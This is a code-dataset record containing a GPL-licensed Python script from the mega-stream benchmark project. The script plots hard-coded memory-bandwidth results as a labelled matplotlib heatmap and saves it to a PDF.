| agpl-3.0 | -2,161,126,652,751,138,000 | 41.785455 | 166 | 0.561023 | false | 4.064249 | false | false | false |
UK-MAC/mega-stream | scripts/heatmap.py | 1 | 2288 | #
#
# Copyright 2016 Tom Deakin, University of Bristol
#
# This file is part of mega-stream.
#
# mega-stream is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# mega-stream is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with mega-stream. If not, see <http://www.gnu.org/licenses/>.
#
#
# This aims to investigate the limiting factor for a simple kernel, in particular
# where bandwidth limits not to be reached, and latency becomes a dominating factor.
#
#
import numpy
import matplotlib.pyplot as plt
data = numpy.zeros((8,5))
data[0] = [71103.0, 114238.5, 94292.4, 92105.7, 52930.6]
data[1] = [147649.4, 223801.5, 251318.1, 227114.9, 196121.0]
data[2] = [252762.3, 311192.7, 294210.3, 227833.1, 185339.1]
data[3] = [310676.5, 395393.0, 302705.0, 195018.7, 0.0]
data[4] = [351479.6, 332399.7, 241249.2, 183720.3, 0.0]
data[5] = [439309.4, 294268.8, 191220.3, 168287.6, 0.0]
data[6] = [411714.6, 212903.5, 167718.5, 0.0, 0.0]
data[7] = [270262.7, 181380.7, 145228.9, 0.0, 0.0]
data *= 1.0E-3
fig, ax = plt.subplots()
plt.pcolor(data, cmap='GnBu')
ax.set_xticks(numpy.arange(data.shape[1]) + 0.5)
ax.set_yticks(numpy.arange(data.shape[0]) + 0.5)
ax.set_xticklabels([4, 8, 16, 32, 64])
ax.set_yticklabels([8, 16, 32, 64, 128, 256, 512, 1024])
ax.set_xlabel('Middle size')
ax.set_ylabel('Inner size')
plt.title('Outer size=64')
cbr = plt.colorbar()
cbr.ax.set_ylabel('Bandwidth GB/s')
# Add data labels
for i in range(data.shape[1]):
for j in range(data.shape[0]):
if (data[j][i] != 0.0):
plt.text(i + 0.5, j + 0.5, '%.1f' % (data[j][i]),
ha='center', va='center',
size='small', color='black', weight='bold')
else:
plt.text(i + 0.5, j + 0.5, '-',
ha='center', va='center',
size='small', color='black', weight='bold')
#fig.set_tight_layout(True)
plt.savefig('heatmap.pdf')
| gpl-3.0 | 1,387,855,735,382,224,000 | 33.149254 | 85 | 0.666958 | false | 2.591166 | false | false | false |